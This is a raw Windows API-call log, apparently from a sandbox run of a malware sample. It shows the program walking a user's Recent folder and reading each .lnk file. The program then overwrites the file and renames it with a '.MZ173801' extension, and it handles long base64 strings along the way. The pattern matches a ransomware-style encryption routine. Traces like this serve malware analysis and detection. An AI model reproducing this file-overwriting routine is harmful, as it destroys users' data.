lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.138] GetCurrentThreadId () returned 0x1358 [0113.138] GetCurrentThreadId () returned 0x1358 [0113.138] GetCurrentThreadId () returned 0x1358 [0113.138] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.138] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.139] GetCurrentThreadId () returned 0x1358 [0113.139] GetCurrentThreadId () returned 0x1358 [0113.139] GetCurrentThreadId () returned 0x1358 [0113.139] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_5 PohF4cOl3RenyNkzK.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_5 pohf4col3renynkzk.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.139] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.139] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.139] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x348 [0113.139] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.139] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x348, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x348, lpOverlapped=0x0) returned 1 [0113.140] CloseHandle (hObject=0x3f4) returned 1 [0113.140] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_5 PohF4cOl3RenyNkzK.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_5 pohf4col3renynkzk.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.141] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x348, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x348, lpOverlapped=0x0) returned 1 [0113.142] CloseHandle (hObject=0x3f4) returned 1 [0113.142] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_5 PohF4cOl3RenyNkzK.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_5 pohf4col3renynkzk.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_5 PohF4cOl3RenyNkzK.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_5 pohf4col3renynkzk.lnk.mz173801")) returned 1 [0113.143] GetCurrentThreadId () returned 0x1358 [0113.143] GetCurrentThreadId () returned 0x1358 [0113.143] GetCurrentThreadId () returned 0x1358 [0113.143] GetCurrentThreadId () returned 0x1358 [0113.143] GetCurrentThreadId () returned 0x1358 [0113.143] GetCurrentThreadId () returned 0x1358 [0113.143] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea8e68ba, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x7e4b1910, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7e4b1910, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x382, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_C-ZbiqZ3CWgavc2.lnk", cAlternateFileName="_C-ZBI~1.LNK")) returned 1 [0113.143] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.143] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.143] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C-ZbiqZ3CWgavc2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_c-zbiqz3cwgavc2.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea8e68ba, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x7e4b1910, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7e4b1910, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x382)) returned 1 [0113.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.144] GetCurrentThreadId () returned 0x1358 [0113.144] GetCurrentThreadId () returned 0x1358 [0113.144] GetCurrentThreadId () returned 0x1358 [0113.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.145] GetCurrentThreadId () returned 0x1358 [0113.145] GetCurrentThreadId () returned 0x1358 [0113.145] GetCurrentThreadId () returned 0x1358 [0113.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C-ZbiqZ3CWgavc2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_c-zbiqz3cwgavc2.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.145] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.145] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.145] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x382 [0113.145] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.145] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x382, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x382, lpOverlapped=0x0) returned 1 [0113.146] CloseHandle (hObject=0x3f4) returned 1 [0113.146] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C-ZbiqZ3CWgavc2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_c-zbiqz3cwgavc2.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.147] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x382, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x382, lpOverlapped=0x0) returned 1 [0113.148] CloseHandle (hObject=0x3f4) returned 1 [0113.149] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C-ZbiqZ3CWgavc2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_c-zbiqz3cwgavc2.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_C-ZbiqZ3CWgavc2.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_c-zbiqz3cwgavc2.lnk.mz173801")) returned 1 [0113.149] GetCurrentThreadId () returned 0x1358 [0113.149] GetCurrentThreadId () returned 0x1358 [0113.149] GetCurrentThreadId () returned 0x1358 [0113.149] GetCurrentThreadId () returned 0x1358 [0113.149] GetCurrentThreadId () returned 0x1358 [0113.149] GetCurrentThreadId () returned 0x1358 [0113.149] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75ec2c33, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75ec2c33, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75ec3fc4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5b9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_HdsGmu6OGd.lnk", cAlternateFileName="_HDSGM~1.LNK")) returned 1 